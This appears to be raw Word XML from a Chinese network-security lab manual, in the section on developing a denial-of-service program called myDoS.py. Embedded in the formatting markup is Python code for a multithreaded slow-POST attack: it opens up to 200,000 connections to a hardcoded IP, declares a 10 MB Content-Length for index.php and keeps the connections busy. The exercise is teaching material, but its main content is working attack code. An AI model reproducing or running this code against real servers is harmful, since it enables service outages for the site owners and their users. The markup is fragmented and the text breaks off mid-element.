    <w:p w14:paraId="4543A913" w14:textId="37EFB94C" w:rsidR="00647CA7" w:rsidRPr="00E66906" w:rsidRDefault="00647CA7" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E66906">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66906">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二种</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66906">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>拒绝服务攻击实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>——开发自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00647CA7">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>拒绝服务攻击程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>myDoS.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA1C16" w14:textId="56827A75"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步骤1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、2、3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A55005" w14:textId="17CEEC89" w:rsidR="00647CA7" w:rsidRDefault="00647CA7" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与（一）一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B75D8"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步骤4：开发拒绝服务攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34A680"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步骤要求：在拒绝服务攻击</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>者端开发</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>多线程攻击流量生成程序，实现并发产生高强度的网络应用服务请求，并将被攻击的网络应用服务器节点IP、并发线程数量作为程序的输入参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4694D" w14:textId="77777777" w:rsidR="00647CA7"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涉及知识：编程技术、计算机网络、多线程开发、网络应用协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EBCF8A"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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E85D139"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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB86DB8"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88"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145608E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A076AF"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MAX_CONN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200000</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最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5FF92"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PORT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p>
    <w:p w14:paraId="615A88BC" w14:textId="46183C3E" w:rsidR="00764D7B" w:rsidRDefault="00764D7B" w:rsidP="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HOST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sidRPr="00764D7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764D7B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>11.93.112.5</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目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>或域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C8882"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PAGE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index.php</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目标页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DD8DD"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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8576DF"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>buf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"POST %s HTTP/1.1\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E01A9"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"Host: %s\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16027029"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"Content-Length: 10000000\r\n"</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实体数据大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76959E79"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 xml:space="preserve">"Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>dklkt_dos_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED7008"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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"\r\n"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PAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> HOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EFC84A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E36925"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socks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F457500"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A6628F"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conn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>thread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281FCE75"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global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> socks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740356B"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MAX_CONN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MAX_CONN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>允许最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E3EB0"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AF_INET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> IPv4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>地址，创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>套接字，必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOCK_STREAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>作为套接字类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C7A03B"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socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>socket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socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>AF_INET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socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165ADD6A"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36ECE727"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connect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HOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C8D1F"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buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146EC2D2"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成功发送</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>!,conn=%d\n"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78349C9F"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socks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156971A8"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ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939F11B"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无法连接服务器或发送错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w: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ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE35FB2"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暂停</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DADCB2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5178DF"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send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>thread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696E58B"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global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> socks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0D9DD"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3E2E15B"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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> socks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC3375"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7D7EC958"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send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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF3DDE"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ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F51BBA"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发送异常</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ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335A39B"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socks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>remove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1BD26706"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close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7125D"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F34EED9" w14:textId="660A9BDB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBBC7F0"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建立多线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1F224"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>conn_th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threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Thread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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>conn_thread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5EE33282"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>send_th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threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Thread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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>send_thread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4D158090"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>开启线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF1FE43"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>conn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB42408"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
